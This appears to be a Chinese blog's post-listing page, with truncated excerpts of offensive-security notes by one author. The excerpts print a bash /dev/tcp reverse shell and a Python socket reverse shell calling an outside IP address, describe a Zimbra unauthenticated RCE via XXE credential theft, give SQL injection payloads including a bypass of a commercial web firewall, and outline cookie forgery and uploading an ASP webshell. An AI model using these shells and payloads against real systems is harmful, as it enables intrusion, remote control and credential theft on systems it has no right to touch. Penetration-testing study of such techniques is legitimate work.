摘要:bash -i >& /dev/tcp/ip/3333 0>&1 python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('149.28.133.203',333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1... 阅读全文
posted @ 2019-07-10 16:29 abuゞ 阅读 (20) 评论 (0) 编辑
摘要:Zimbra未登录RCE漏洞利用 首先我是根据这个PDF进行复现的,但是复现过程出现很多问题 首先使用这个XXE读取文件 如果成功就可以继续了,然后使用 出现http503以及普通权限账号记录下来<key name="zimbra_ldap_passwd">后面的value记录下来 下一步要记得地址 阅读全文
posted @ 2019-04-20 16:21 abuゞ 阅读 (64) 评论 (0) 编辑
摘要:and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM admin limit 0,1))) AND '使用内联注释绕过360默认wafAPI and extractvalue(1, /*!50000concat*/(0x7e,(/*!50000SELECT*/ distinct co... 阅读全文
posted @ 2019-04-20 16:16 abuゞ 阅读 (21) 评论 (0) 编辑
摘要:上传脚本访问获取cookie 修改cookie访问:6588/admin/index.asp成功进入留意下响应码是302 做个rar,等下上传到网站根目录,rar的内容必须是个asp马6588web环境不支持php脚本 阅读全文
posted @ 2019-04-19 21:33 abuゞ 阅读 (55) 评论 (0) 编辑
摘要:注入: MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,user())),1);ERROR 1105 (HY000): XPATH syntax 阅读全文
posted @ 2019-03-11 20:06 abuゞ 阅读 (26) 评论 (0) 编辑
摘要:mysql> select * from web_member_data where Oid='1ogout′and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' and Status=0;Empty set 改用union mysql> 阅读全文
posted @ 2019-02-27 21:02 abuゞ 阅读 (27) 评论 (0) 编辑
摘要:Msql注入方式 发现网上都很多就收集了一下. 代码审计学习记录 0x00-报错注入 mysql报错注入,我们有时候会遇到没有正常数据回显的注入.这时候就需要报错注入来获得我们需要的数据. 我们经常用到的有floor(),updatexml(),extractvalue()通过查找资料发现还有一些函 阅读全文
posted @ 2016-07-01 15:50 abuゞ 阅读 (89) 评论 (0) 编辑